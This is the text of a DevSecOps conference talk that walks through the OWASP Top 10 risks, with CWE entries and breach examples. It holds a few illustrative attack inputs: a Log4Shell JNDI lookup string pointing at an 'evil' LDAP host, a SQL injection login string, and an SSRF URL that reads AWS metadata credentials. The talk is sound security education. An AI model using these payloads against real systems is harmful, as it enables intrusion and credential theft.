We all are

DevSecOps

Marcin Łapaj

28.11.2023
...
The problem of viruses is temporary
and will be solved in two years.
The problem of viruses is temporary
and will be solved in two years.
John McAfee, 1988
… our code is secure.
What about …

.. frameworks

.. libraries

.. runtime

.. container
Vulnerabilities are discovered every day
in …

… libraries

… runtimes

… containers

.. and attackers don’t take excuses

 Open Worldwide Application Security Project
nonpro t foundation that works to improve the security of software

Tools Resources Education Networking

OWASP Top 10 Proactive Controls ASVS Dependency Track

more …
https://owasp.org/projects/
fi
 Security in Software Development Lifecycle

Security Review Pen Tests

Requirements
Design Development Testing Deployment
De nition

Maintain
fi
 OWASP Top 10 Web Applications Security Risks

A02:
A01: Broken A04: Insecure A05: Security
Cryptographic A03: Injection
Access Control Design Miscon guration
Failures

A06: Vulnerable A07: Identi cation A08: Software and A09: Security A10: Server-Side
and Outdated and Authentication Data Integrity Logging and Request Forgery
Components Failures Failures Monitoring Failures (SSRF)
fi
fi
 OWASP Top 10 Web Applications Security Risks

A02:
A01: Broken A04: Insecure A05: Security
Cryptographic A03: Injection
Access Control Design Miscon guration
Failures

A06: Vulnerable A07: Identi cation A08: Software and A09: Security A10: Server-Side
and Outdated and Authentication Data Integrity Logging and Request Forgery
Components Failures Failures Monitoring Failures (SSRF)
fi
fi
 … top 10 … CWE … CVE

Most critical security risks in Common Weakness Common Vulnerabilities and

web applications Enumeration Exposures

Broad risk categories that

En u m erate d type of E n um e ra te d type of
can contain multiple CWEs
software weakness software vulnerability
and is ordered by criticality
CWE-20 Improper Input Validation
CVE-2021-44228
CWE-400 Uncontrolled Resource Consumption
Log4Shell
CWE-502 Deserialization of Untrusted Data
 A04
Insecure Design

CWE-522: Insu ciently Protected Credentials

CWE-501: Trust Boundary Violation

CWE-209: Generation of Error Message Containing Sensitive Information

ffi
 Insecure Design

Difference between insecure design and insecure implementation

implementation bug vs. design aw

A secure design can still have implementation defects,

an insecure design cannot be fixed by a perfect implementation.

fl
 Insecure Design
example

Pass wo rd Re se t

Questions & Answers

What is your dog name?

What is your mother maiden name?
These can be found i.e. in social media …
 Insecure Design
example

Adobe 2013 Password Leak

Play Crosswords!
password hints

encrypted passwords

BrxFWywGE4c=

horse | mythical | one horned horse | the usual

 Insecure Design
prevention

Involve security in architecture

Security by design
Use security patterns

Perform designated threat modeling to challenge the design

Identify trust boundaries
Identify threats
Derive counter measures to improve design

Establish a secure development lifecycle (SDLC)

 A05
Security Miscon guration

CWE-16 Con guration

CWE-611 Improper Restriction of XML External Entity Reference

CWE-1004 Sensitive Cookie Without 'HttpOnly' Flag

fi
fi
 Security miscon guration

Working

vs

Configured Properly
fi
 Security miscon guration
example

Open S3 bucket
Default credentials
Monitoring endpoint that reveal lots of information
Unnecessary open ports
Disabled security features
fi
 Security miscon guration
example

used misconfigured S3 buckets

100 US cities using the same product, mapsonline.net
86 miscon gured Amazon S3 buckets
1000 GB of data
1.6 million les
fi
fi
fi
 A06
Vulnerable and Outdated Components

CWE-1035: Using Components with known vulnerabilities

CWE-1104: Use of Unmaintained Third-Party Components

 Vulnerable and Outdated Components

Vulnerabilities go public and are ready to use

https://www.exploit-db.com/
 Log4Shell
JNDI Attack

Resulted in critical remote code execution vulnerability in lots of java applications

Even made it to to general news

payload Evil.class

${ jndi:ldap ://evil:1389/Ex ploit }

Lo g4J log ger

${prefix:name}
 Vulnerable and Outdated Components
example

129,000 customers,
as well as financial
information of its
former employee

Accellion FTA 20 your old le sharing platform that was EOL

fi
 Vulnerable and Outdated Components
scan for vulnerabilities

DependencyTrack
 Vulnerable and Outdated Components
scan for vulnerabilities

Development Testing Deployment

Maintain
 A01
Broken Access Control

CWE-284: Improper Access Control

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

CWE-201: Exposure of Sensitive Information Through Sent Data

CWE-352: Cross-Site Request Forgery

 Insecure Direct Object References

https://mybank.com/account/1001

https://mybank.com/account/3005

Manipulate Object Reference and execute a HTTP request

Insecure Direct Object References
example
Insecure Direct Object References
example
 A02
Cryptographic Failures

CWE-327: Broken or Risky Crypto Algorithm

CWE-331 Insu cient Entropy

CWE-319 Cleartext Transmission of Sensitive Information

ffi
 Cryptographic Failures
example

data transmitted in plain text

old or week cryptography, deprecated hash functions MD5 or SHA1

credentials stored without salting

 Cryptographic Failures
example

use strong standard cryptography - not invent your own

encrypt all data in transit - HTTPS

encrypt all sensitive data at rest

 Cryptographic Failures
example

database uses unsalted or simple hashes

attacker retrieves the password database

rainbow table is used to decrypt unsalted hashes

salted hash generated with simple function can be cracked

 Cryptographic Failures
SOPS

e nc r y p t

co nfi g .y am l c on f i g. y am l
Pri v a te Ke y

M ozi l la S OP S
p ul l d e cr yp t

d ep lo y m ent
Pr iv a teKey
 A03
Injection

CWE-89: SQL Injection,

CWE-79: Cross-site Scripting

 Injection
tricking the application

M ali ci ou s In put I n ter p re ter E xe c u ti on

 SQL injection
some SQL query

expected happy path

deactivate for known user … try a random user

SQL injection
example
SQL injection
example

admin’ #
SQL injection
example
 A07
Identi cation and Authentication Failures

CWE-521: Weak Password Requirements

CWE-287: Improper Authentication

CWE-384: Session Fixation

CWE-288: Authentication Bypass Using an Alternate Path or Channel

fi
 Identi cation and Authentication Failures
prevention

Use multi factor authentication

No default credentials
Limit or delay failed login attempts
Password length, complexity, and rotation policies
Generic error messages
(not "wrong password" when user exists)
fi
 A08
Software and Data Integrity Failures

CWE-829: Inclusion of Functionality from Untrusted Control Sphere

CWE-502: Deserialization of Untrusted Data.

CWE-494: Download of Code Without Integrity Check

 Software and Data Integrity Failures
example

S ol ar W i nds "Or ion" I T m onitor ing

s y s te m has priv ileg ed ac ces s to
IT s y stem s to ga in lo gs an d d at a

Hackers insert malicious code into Orion

Solarwinds unwittingly sent out software updates with malicious code

affected over 100 companies

Through this code, hackers installed even more malware

 Software and Data Integrity Failures
prevention

Verify downloaded packages (checksums)

Consume trusted repositories

Verify components for vulnerabilities

 A10
Server-Side Request Forgery (SSRF)

CWE-918 Server-Side Request Forgery (SSRF)

 Server-Side Request Forgery (SSRF)

internal infrastructure

HTTP Req uest

WAF

SSRF SSRF
webapp
content co nten t

ser vic e

Resp onse
 Server-Side Request Forgery (SSRF)
example

100 mil ion individuals in the US

6 mil i on i n Canada
Soci al Se cu rity numbers
AWS VPC
Bank A cc ount numb er s

ISRM-WAF-Role
SSRF Met adat a En dpoin t
169.254.169.254
conte nt
WAF

SSRF E2C
content
http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role

li st buckets

ISRM-WAF-Ro le access S3 instance

 A09
Security Logging and Monitoring Failures

CWE-778 Insu cient Logging

CWE-117 Improper Output Neutralization for Logs

CWE-532 Insertion of Sensitive Information into Log File

ffi
 RevealStackTrace
Security Logging and Monitoring Failures
example
Security Logging and Monitoring Failures
example
Security Logging and Monitoring Failures
prevention

Id e nt i f y i n g s ec u ri ty inc ide n ts
M o n i to r i ng po l i c y v iola tio n s

d o n o t l og
s e ns i t i v e i n f or ma tion
 Thank y ou!

Oceń mój w yk ład w ap li kacj i eventor y